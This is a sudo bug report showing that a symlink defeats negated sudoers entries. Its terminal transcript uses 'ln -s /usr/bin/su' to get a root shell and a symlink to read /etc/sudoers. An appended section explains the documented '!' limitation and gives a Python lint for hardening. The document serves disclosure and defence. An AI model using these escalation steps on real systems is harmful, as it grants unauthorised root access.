Bug 1009

Summary: Bypass Sudo Editing block on any blocked file
Product: Sudo
Reporter: Tommy (dawgyg) DeVoss <dawgyg>
Component: Sudo
Assignee: Todd C. Miller <Todd.Miller>
Status: RESOLVED WONTFIX
Severity: high
Priority: high
Version: 1.8.32
Hardware: All
OS: Linux

Description Tommy (dawgyg) DeVoss 2021-11-21 22:20:06 MST
When you add a user to the sudoers file and attempt to block them from editing specific files, you can do this by the following:

username   ALL=ALL, !/usr/bin/su

This will prevent the user from running the sudo su command to get a root shell.

I have found that the following exploit will work:

1c44h1wy7i@pd-lpsrtlus498:~$ sudo su
Sorry, user 1c44h1wy7i is not allowed to execute '/usr/bin/su' as root on pd-lpsrtlus498.amberjack.launchpoint.
1c44h1wy7i@pd-lpsrtlus498:~$ ln -s /usr/bin/su su_exploit
1c44h1wy7i@pd-lpsrtlus498:~$ sudo ./su_exploit
root@pd-lpsrtlus498:/home/AMBERJACK/1c44h1wy7i# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@pd-lpsrtlus498:/home/AMBERJACK/1c44h1wy7i# 


This works for any file that has been explicitly blacklisted, and can also be used to edit blacklisted files.

1c44h1wy7i@pd-lpsrtlus498:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
1c44h1wy7i@pd-lpsrtlus498:~$ sudo cat /etc/sudoers
Sorry, user 1c44h1wy7i is not allowed to execute '/usr/bin/cat /etc/sudoers' as root on pd-lpsrtlus498.amberjack.launchpoint.
1c44h1wy7i@pd-lpsrtlus498:~$ ln -s /etc/sudoers sudoers_exp
1c44h1wy7i@pd-lpsrtlus498:~$ sudo cat sudoers_exp
# testing
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#


This appears to work on any version of sudo 1.8.x (including the default sudo 1.8.31/32 available on Ubuntu 20).

It is patched on Sudo version 1.9.5p2 installed on my Fedora box. (Not sure what version patched it.)
Comment 1 Tommy (dawgyg) DeVoss 2021-11-21 22:39:52 MST
It isn't fixed in latest. I had a typo in my sudoers file. So it works on any version including latest.
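The behaviour reported above is the documented limitation of the `!` operator in sudoers(5) ("Limitations of the '!' operator"): sudo matches commands by the path the user typed, so a negated entry cannot subtract a command from a broader grant such as `ALL`, which is why the report was closed WONTFIX. The defensive fix is to write user specifications as allowlists of exact commands rather than `ALL` minus a few paths. The following lint is an added example (not sudo's own code, and not from the reporter): it parses user specification lines from constructed sample sudoers text and flags specs that rely on negation, rating ones that negate from `ALL` as high. The regexes, the sample policy and the `lint_sudoers`/`parse_user_specs` names are this example's own assumptions and only cover plain user specs (aliases, `#include` directives and multi-line specs are skipped).

```python
import re

# Constructed sample policy; not taken from the reporter's host.  The %admin
# line is the denylist pattern from the bug report, the deploy line is the
# allowlist style that does not depend on negation.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults    env_reset
root        ALL=(ALL:ALL) ALL
%admin      ALL=(ALL) ALL, !/usr/bin/su, !/bin/bash
deploy      ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
auditor     ALL=(root) /usr/bin/cat /var/log/secure, !/usr/bin/cat /etc/shadow
"""

# user  host=(runas) cmd, cmd, ...   (assumed simplified grammar)
USER_SPEC = re.compile(
    r'^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*'
    r'(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$'
)
# leading tags such as NOPASSWD: or NOEXEC: in front of a command
TAGS = re.compile(r'^(?:[A-Z_]+:\s*)+')


def parse_user_specs(text):
    """Return [(user, [(negated, command), ...]), ...] for each user spec line."""
    specs = []
    for raw in text.splitlines():
        # treat everything after '#' as a comment (real sudoers also has
        # #include/#includedir directives; they are ignored here)
        line = raw.split('#', 1)[0].strip()
        if not line or line.startswith('Defaults') or re.match(r'^\w+_Alias\b', line):
            continue
        m = USER_SPEC.match(line)
        if not m:
            continue
        cmds = []
        for item in m.group('cmds').split(','):
            item = TAGS.sub('', item.strip())
            negated = item.startswith('!')
            cmds.append((negated, item.lstrip('!').strip()))
        specs.append((m.group('user'), cmds))
    return specs


def lint_sudoers(text):
    """Flag user specs that use '!' as a denylist.

    severity 'high': a negated command sits beside ALL, which sudoers(5)
    says cannot be subtracted from; the negation is a no-op in practice.
    severity 'low': negation beside a narrow grant; still not a boundary,
    but the positive grant itself limits what can run.
    """
    findings = []
    for user, cmds in parse_user_specs(text):
        denied = [c for neg, c in cmds if neg]
        if not denied:
            continue
        allowed = [c for neg, c in cmds if not neg]
        findings.append({
            'user': user,
            'allowed': allowed,
            'denied': denied,
            'severity': 'high' if 'ALL' in allowed else 'low',
        })
    return findings


if __name__ == '__main__':
    for f in lint_sudoers(SAMPLE_SUDOERS):
        print(f"[{f['severity']}] {f['user']}: negates {f['denied']} "
              f"from {f['allowed']}; rewrite as an explicit allowlist")
```

Run it over `/etc/sudoers` and each file in `/etc/sudoers.d/` (as root, since they are mode 0440), then confirm the effective policy for a given account with `sudo -l -U user`; a spec that shows `ALL` followed by `!` entries should be replaced with the exact commands that account needs.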